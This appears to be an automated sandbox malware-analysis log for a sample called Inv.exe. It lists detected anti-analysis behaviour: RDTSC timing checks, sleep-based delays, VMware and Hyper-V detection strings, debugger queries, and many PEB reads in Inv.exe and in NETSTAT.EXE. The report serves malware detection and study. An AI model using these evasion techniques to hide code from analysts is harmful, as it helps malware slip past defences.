          Source: C:\Windows\SysWOW64\NETSTAT.EXE | RDTSC instruction interceptor: First address: 00000000003598E4 second address: 00000000003598EA instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | RDTSC instruction interceptor: First address: 0000000000359B5E second address: 0000000000359B64 instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 6700 | Thread sleep count: 65 > 30
          Source: C:\Windows\explorer.exe TID: 6700 | Thread sleep time: -130000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6576 | Thread sleep count: 43 > 30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6576 | Thread sleep time: -86000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Last function: Thread delayed
          Source: explorer.exe, 00000002.00000000.690270641.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.686106576.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.690270641.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000002.1056063670.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000002.00000000.690752068.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.690969786.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Inv.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Inv.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process queried: DebugPort
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Code functions reading the PEB (mov reg, dword ptr fs:[00000030h]); one line per function, with the number of reads the report lists inside that function given in parentheses where it is more than one:
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_01236A00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_0073E912 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_0073F1BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_0073F181 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_0073F221 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 0_2_0073F369 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01236A00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01972990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0197A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0196C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019C51BE mov eax, dword ptr fs:[00000030h] (4 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019761A0 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019C69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0194B1E1 mov eax, dword ptr fs:[00000030h] (3 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019D41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01949100 mov eax, dword ptr fs:[00000030h] (3 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0197513A mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01964120 mov eax, dword ptr fs:[00000030h] (4 reads); mov ecx, dword ptr fs:[00000030h] (1 read)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0196B944 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0194B171 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0194C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01949080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019C3884 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0197F0BF mov ecx, dword ptr fs:[00000030h] (1 read); mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019890AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h] (6 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h] (5 reads); mov ecx, dword ptr fs:[00000030h] (1 read)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019458EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019C7016 mov eax, dword ptr fs:[00000030h] (3 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A14015 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0197002D mov eax, dword ptr fs:[00000030h] (5 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0195B02A mov eax, dword ptr fs:[00000030h] (4 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01960050 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A02073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A11074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01972397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A15BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0197B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01951B8F mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019FD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A0138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01974BAD mov eax, dword ptr fs:[00000030h] (3 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019C53CA mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h] (6 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0196DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A0131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0194F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0194DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01973B7A mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0194DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A18B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0197D294 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0195AAB0 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0197FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h] (5 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01972ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01972AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0194AA16 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01945210 mov eax, dword ptr fs:[00000030h] (3 reads); mov ecx, dword ptr fs:[00000030h] (1 read)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01963A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01958A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01984A2C mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A18A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019D4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01949240 mov eax, dword ptr fs:[00000030h] (4 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0198927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A0EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019FB260 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0197FD9B mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A105AC mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01972581 mov eax, dword ptr fs:[00000030h] (4 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h] (5 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01971DB5 mov eax, dword ptr fs:[00000030h] (3 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019735A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A0FDE2 mov eax, dword ptr fs:[00000030h] (4 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h] (5 reads); mov ecx, dword ptr fs:[00000030h] (1 read)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019F8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0195D5E0 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A18D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A0E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] (13 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0194AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019CA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01974D3B mov eax, dword ptr fs:[00000030h] (3 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01967D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01983D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019C3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0196C577 mov eax, dword ptr fs:[00000030h] (2 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0195849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A014FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019C6CF0 mov eax, dword ptr fs:[00000030h] (3 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A18CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h] (4 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] (14 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_01A1740D mov eax, dword ptr fs:[00000030h] (3 reads)
          Source: C:\Users\user\Desktop\Inv.exe | Code function: 1_2_0197BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01958794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019837F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A1070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A1070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01944F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01944F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A18F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019736CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019FFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01988EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019716E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A18ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019576E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E42AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E42ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E2AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E2AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ECB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ECB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EE8A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E5927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E19240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E19240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E19240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E19240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EDEA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EA4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E54A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E54A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E28A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E15210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E15210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E15210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E15210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E1AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E1AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EDAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EDAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E33A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E3DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E953CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E953CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E44BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E44BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E44BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EE5BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ECD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E21B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E21B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E42397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E4B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E1DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E43B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E43B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E1DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02EE8B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02E1F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\NETSTAT.EXE    Code function: 4_2_02ED131B mov eax, dword ptr fs:[00000030h]
